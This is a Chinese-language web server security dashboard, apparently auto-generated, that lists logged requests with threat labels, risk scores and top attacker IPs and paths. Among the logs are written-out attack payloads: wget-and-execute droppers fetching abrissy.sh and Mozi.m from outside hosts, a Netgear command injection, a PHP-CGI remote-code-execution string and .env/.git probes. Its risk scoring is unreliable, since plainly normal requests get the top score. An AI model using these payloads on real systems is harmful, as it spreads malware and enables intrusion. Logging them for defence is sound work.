安全监控面板

高风险威胁

100

过去24小时内

中风险威胁

过去24小时内

日志分析

2370

已分析/总数: 2370/2370

安全评分

20/100

当前状态

威胁分析

时间	IP地址	威胁类型	风险评分	请求路径	状态
2025-05-16 17:01:57+00:00	162.216.149.143	扫描探测	1.00	GET /	200
2025-05-08 14:03:52+00:00	35.203.211.163	网络扫描	1.00	GET /	200
2025-04-16 21:04:09+08:00	5.183.209.244	无明显攻击行为	1.00	GET /	200
2025-04-16 21:03:46+08:00	112.86.225.154	正常请求	1.00	GET /	200
2025-04-16 21:00:38+08:00	64.227.46.239	信息泄露	1.00	GET /ads.txt	404
2025-04-16 20:47:53+08:00	101.89.87.44	无	1.00	GET /	200
2025-04-16 20:46:53+08:00	198.235.24.132	无攻击请求	1.00	GET /	200
2025-04-16 20:45:56+08:00	154.81.156.34	正常请求	1.00	GET /	200
2025-04-16 20:42:00+08:00	207.46.13.160	高风险请求	1.00	GET /	200
2025-04-16 20:40:03+08:00	146.190.248.63	正常请求	1.00	GET /robots.txt	404
2025-04-16 20:38:12+08:00	165.227.214.162	正常请求	1.00	GET /	200
2025-04-16 20:37:13+08:00	154.81.156.35	无明显攻击	1.00	GET /	200
2025-04-16 20:34:25+08:00	154.81.156.34	正常请求	1.00	GET /	200
2025-04-16 20:16:14+08:00	47.236.251.77	信息获取请求	1.00	GET http://passport.baidu.com/	200
2025-04-16 20:14:40+08:00	154.81.156.54	非攻击请求	1.00	GET /	200
2025-04-16 20:07:04+08:00	185.218.86.4	无	1.00	GET /	200
2025-04-16 19:39:11+08:00	124.226.222.66	无攻击	1.00	GET /	200
2025-04-16 19:38:06+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 19:24:02+08:00	101.89.87.44	正常请求	1.00	GET /	200
2025-04-16 19:19:07+08:00	93.174.93.12	无风险	1.00	GET /	200
2025-04-16 19:07:12+08:00	154.81.156.54	正常访问	1.00	GET /	200
2025-04-16 19:05:49+08:00	8.146.204.129	正常请求	1.00	GET /	200
2025-04-16 19:04:35+08:00	124.156.157.91	无	1.00	GET /	200
2025-04-16 18:59:34+08:00	112.86.225.202	正常访问	1.00	GET /	200
2025-04-16 18:58:39+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 18:54:48+08:00	154.81.156.34	正常请求	1.00	GET /	200
2025-04-16 18:53:15+08:00	36.150.60.24	无明显威胁	1.00	GET /	200
2025-04-16 18:47:17+08:00	112.86.225.103	网络爬虫请求	1.00	GET /	200
2025-04-16 18:45:27+08:00	185.218.86.4	正常请求	1.00	GET /	200
2025-04-16 18:44:19+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 18:43:15+08:00	221.178.143.70	无	1.00	GET /	200
2025-04-16 18:39:56+08:00	123.163.214.142	无	1.00	GET /	200
2025-04-16 18:38:38+08:00	154.81.156.54	正常访问	1.00	GET /	200
2025-04-16 18:38:13+08:00	101.89.87.44	无特定攻击	1.00	GET /favicon.ico	404
2025-04-16 18:37:13+08:00	154.81.156.54	无	1.00	GET /	200
2025-04-16 18:36:02+08:00	117.33.163.216	无特定攻击	1.00	GET /	200
2025-04-16 18:35:22+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 18:33:26+08:00	154.81.156.34	正常请求	1.00	GET /	200
2025-04-16 18:32:29+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 18:25:14+08:00	66.249.66.41	无明显威胁	1.00	GET /?_ga=2.199624685.1958107169.1723855205-937629273.1699907945&_bdsid=38cmnh.n~FPIGV.1794554303662.1776738805&_bd_prev_page=http://gagalekaihua.com/item.aspx?072005244.htm	200
2025-04-16 18:23:10+08:00	138.246.253.24	信息探测	1.00	GET /robots.txt	404
2025-04-16 18:19:10+08:00	218.106.90.148	正常请求	1.00	GET /favicon.ico	404
2025-04-16 18:18:42+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 18:18:18+08:00	154.81.156.35	无潜在威胁	1.00	GET /	200
2025-04-16 18:16:04+08:00	154.81.156.54	无明确攻击请求	1.00	GET /	200
2025-04-16 18:14:30+08:00	92.255.57.45	正常请求	1.00	GET /	200
2025-04-16 18:11:06+08:00	167.94.146.52	普通请求	1.00	GET /	200
2025-04-16 18:09:07+08:00	167.94.138.63	无	1.00	GET /favicon.ico	404
2025-04-16 18:07:58+08:00	154.81.156.54	无明显威胁	1.00	GET /	200
2025-04-16 18:06:33+08:00	43.128.156.124	无攻击	1.00	GET /	200
2025-04-16 18:01:56+08:00	159.65.6.93	正常请求	1.00	GET /	200
2025-04-16 17:58:51+08:00	154.81.156.35	正常访问	1.00	GET /	200
2025-04-16 17:55:46+08:00	154.81.156.54	正常请求	1.00	GET /	200
2025-04-16 17:00:30+08:00	2.58.56.137	无	1.00	GET /blog	404
2025-04-16 16:40:45+08:00	185.36.81.82	远程命令执行	1.00	GET /shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh	404
2025-04-16 10:26:02+08:00	185.36.81.82	远程命令执行	1.00	GET /shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh	404
2025-04-14 11:42:23+08:00	219.157.179.62	命令注入攻击	1.00	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://219.157.179.62:44311/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	404
2025-04-16 18:22:18+08:00	207.154.202.183	敏感信息探测	0.90	GET /.git/config	404
2025-04-16 12:21:00+08:00	82.118.29.202	敏感文件探测	0.90	POST /local/.env	404
2025-04-16 12:06:52+08:00	82.118.29.189	敏感文件探测	0.90	POST /core/.env	404
2025-04-16 12:04:29+08:00	82.118.29.160	敏感文件探测	0.90	POST /back/.env	404
2025-04-16 11:58:16+08:00	82.118.29.159	敏感文件探测	0.90	POST /application/.env	404
2025-04-16 11:53:33+08:00	82.118.29.189	敏感文件探测	0.90	POST /local/.env	404
2025-04-16 11:49:38+08:00	82.118.29.166	敏感文件探测	0.90	POST /cms/.env	404
2025-04-16 11:46:39+08:00	82.118.29.212	敏感文件探测	0.90	POST /core/.env	404
2025-04-16 11:43:19+08:00	82.118.29.198	敏感文件探测	0.90	POST /system/.env	404
2025-04-16 11:40:59+08:00	82.118.29.189	敏感文件探测	0.90	POST /private/.env	404
2025-04-16 11:31:05+08:00	82.118.29.212	敏感文件探测	0.90	POST /system/.env	404
2025-04-16 11:29:44+08:00	82.118.29.198	敏感文件探测	0.90	POST /private/.env	404
2025-04-16 11:28:50+08:00	82.118.29.204	敏感文件探测	0.90	POST /cp/.env	404
2025-04-16 11:06:57+08:00	82.118.29.182	远程代码执行	0.90	POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	404
2025-04-16 11:06:31+08:00	82.118.29.160	远程代码执行	0.90	POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	404
2025-04-16 09:02:39+08:00	87.121.84.209	目录遍历攻击	0.90	GET /?UrkCEO/edit&theme=margot&squelette=../../../../../../../..//bin/bash%20-c%20%27ping%20-c%201%2031.15.17.163%27&style=margot.css	200
2025-04-16 08:43:06+08:00	45.148.10.34	目录遍历攻击	0.90	GET /static../.git/config	404
2025-04-16 08:38:33+08:00	45.148.10.34	敏感文件探测	0.90	GET /prod/.env	404
2025-04-15 23:27:40+08:00	45.148.10.34	目录遍历攻击	0.90	GET /media../.git/config	404
2025-04-13 23:42:02+08:00	176.65.138.171	远程代码执行	0.90	POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input	404
2025-05-21 12:28:24+00:00	167.94.138.49	SSL/TLS握手探测	0.80	\x16\x03\x01 /	400
2025-05-20 23:47:51+00:00	80.94.95.84	异常请求攻击	0.80	\x03 /	400
2025-05-20 19:54:01+00:00	83.222.190.78	异常请求攻击	0.80	\x03 /	400
2025-05-20 18:11:19+00:00	192.155.90.220	异常协议请求	0.80	\x16\x03\x01\x01\n /	400
2025-05-20 18:11:18+00:00	192.155.90.220	SSL/TLS协议探测	0.80	\x16\x03\x01\x01\n /	400
2025-05-20 01:31:03+00:00	167.94.138.50	SSL/TLS协议探测	0.80	\x16\x03\x01 /	400
2025-05-18 16:14:13+00:00	206.168.34.192	SSL/TLS握手探测	0.80	\x16\x03\x01 /	400
2025-05-17 18:00:15+00:00	45.227.254.155	异常请求攻击	0.80	\x03 /	400
2025-05-17 03:38:19+00:00	167.94.138.187	异常协议请求	0.80	\x16\x03\x01 /	400
2025-05-16 22:20:23+00:00	113.215.189.188	SSL/TLS协议探测攻击	0.80	\x16\x03\x03\x01\x02\x01 /	400
2025-05-16 22:03:39+00:00	112.124.67.212	SSL/TLS协议探测	0.80	\x16\x03\x01\x02 /	400
2025-05-16 22:03:29+00:00	112.124.67.212	网络扫描	0.80	GET /evox/about	404
2025-05-16 22:03:29+00:00	112.124.67.212	扫描探测	0.80	POST /sdk	404
2025-05-16 22:03:29+00:00	112.124.67.212	网络扫描	0.80	GET /nmaplowercheck1747433009	404
2025-05-16 17:35:05+00:00	108.143.216.145	扫描探测	0.80	GET /flumemaster.jsp	404
2025-05-16 17:35:05+00:00	108.143.216.145	扫描探测	0.80	POST /sdk	404
2025-05-16 12:11:32+00:00	101.133.135.162	异常协议请求	0.80	\x16\x03\x01\x02 /	400
2025-05-16 03:04:25+00:00	45.142.193.132	异常请求攻击	0.80	\x03 /	400
2025-05-15 16:17:28+00:00	167.94.138.53	SSL/TLS协议探测	0.80	\x16\x03\x01 /	400
2025-05-15 07:56:47+00:00	122.231.191.3	SSL/TLS协议探测	0.80	\x16\x03\x01\x02 /	400
2025-05-14 22:42:02+00:00	91.238.181.94	异常请求攻击	0.80	\x03 /	400
2025-05-14 20:45:27+00:00	47.103.33.128	SSL/TLS协议探测	0.80	\x16\x03\x01\x02 /	400
2025-05-14 15:01:34+00:00	106.14.45.145	SSL/TLS协议探测	0.80	\x16\x03\x01\x02 /	400

日志分析

威胁类型分布

风险评分分布

统计数据

威胁趋势（过去7天）

Top 5 攻击源IP

IP地址	威胁次数	最高风险
154.81.156.54	13	1.00
154.81.156.34	4	1.00
112.124.67.212	4	0.80
101.89.87.44	3	1.00
154.81.156.35	3	1.00

Top 5 攻击路径

路径	威胁次数	最高风险
/	63	1.00
/favicon.ico	3	1.00
/robots.txt	2	1.00
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh	2	1.00
/local/.env	2	0.90

安全建议

基于当前威胁分析的安全建议

定期备份重要数据，并测试恢复流程
定期更新服务器和应用程序，修补已知漏洞
实施强密码策略，使用多因素认证